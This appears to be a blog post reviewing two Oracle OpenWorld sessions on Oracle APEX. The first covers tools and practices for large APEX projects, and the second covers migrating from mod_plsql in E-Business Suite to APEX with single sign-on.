They have readymade scripts to create new projects that sets up filesystem directories, APEX application, and subversion.

They're finding that the agile project methodology works very well for APEX-projects.

To automate testing, they're using Selenium. I find the number of times this product mentioned at OOW interesting. It is a product we have on the list of technologies to know/learn at work, but most people I've talked with have not been aware of it. I guess it differs between markets and it may also be a tool that more advanced web-developers are more familiar with.

To check consistency in a large projects with many developers, they recommend to use the APEX advisor to get a report on things to look into.

Sumneva has created their own PM tool to track tickets with. It is aware of APEX specific things such as the url to the app and the alias of the app.

Using the feedback features to collect data from the users works very well for them in their projects. They use the provided features when possible, and a custom version when they cannot access production environments that allos the users to log data into an application on their servers.

Tools they find useful includes:

  • Selenium
  • Firebug
  • SQL Developer
  • Subversion
  • Jira or other ticketing system
  • Reusable APEX components
  • Publish defaults to apps via a master app
  • Use interface defaults

While the presentation didn't really tell me what it takes on the technical side to run a large project, it was clear that it is very possible. But, as with all large projects it requires planning for both functional and technical aspects of the project.

The next presentation was moving from mod_plsql in Oracle E-Business suite to APEX. The reason it is needed is that mod_plsql is not supported in the latest version of ebiz.

Unfortunately the presentation focused so much on the solution they had and the specifics of what they needed that it was hard to extract any APEX specific knowledge from the presentation. Most of the presentation was centered on the fact that they wanted to have SSO between ebiz and the APEX application and how they needed links to go from ebiz to the apex application so it felt like one application for the end-users. They succeeded with that, but the presentation did not provide enough details for what they did or even what they main hurdles they encountered was.

Posted in APEX, OOW, Oracle